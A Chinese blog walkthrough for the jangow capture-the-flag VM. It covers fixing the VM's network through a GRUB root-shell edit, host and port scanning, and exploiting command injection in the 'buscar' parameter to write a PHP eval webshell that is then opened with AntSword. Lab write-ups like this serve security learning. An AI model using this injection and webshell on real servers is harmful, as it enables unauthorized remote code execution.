当前位置: 首页 > news >正文

jangow靶机攻略

news 2025/5/13 20:05:08

配置网卡

VMware需要配置,不配置扫不到ip,VirtualBox正常打开ip会直接显示出来

网卡配置都改成NAT

打开虚拟机,第一个框选第二行,回车

选第二个,按e键 

进入下一个框后,将ro 后面的修改为= rw signin init=/bin/bash

按ctrl+x ,进入命令界面 

cd etc

cd network

ls

vim interfaces

 进入文件后,把网卡改成ens33

之后重启,打开后就不用管了

 开始攻略

扫描ip

arp-scan -l

 扫描端口

nmap -sV 

 访问80端口

点击site

各个功能点都试了之后,发现在右上角的buscar点击之后网页上会有参数

输入whoami,发现有回显,说明存在漏洞

输入一句话木马

echo '<?php eval($_POST["cmd"]);'  > 1.php

访问发现成功写入 

 尝试使用蚁剑连接


http://www.mrgr.cn/news/95711.html

相关文章:

  • 中间件解析漏洞之Tomcat集合
  • 大模型的后训练(post-training)方法
  • JDK 24:Java 24 中的新功能
  • K8s 是什么? 基本元件、核心功能、4 大优点一次看!
  • Unity Shader编程】之复杂光照
  • RAG优化:Python从零实现强化学习RL增强
  • C语言动态内存管理深度解析与嵌入式开发实战
  • C++类与对象的第二个简单的实战练习-3.24笔记
  • RAG优化:python从零实现时间管理大师Self-RAG
  • Apollo 相关知识点
  • 中间件框架漏洞攻略
  • C++友元:跨墙访问的三种姿势
  • C/C++蓝桥杯算法真题打卡(Day10)
  • Android 系统进程启动Activity方法说明
  • C++——引用
  • 【前端工程化】
  • (UI自动化测试web端)第二篇:元素定位的方法_name定位
  • 快速部署Samba共享服务器作为k8s后端存储
  • 3. 轴指令(omron 机器自动化控制器)——>MC_SetPosition
  • Python中json和jsonify的使用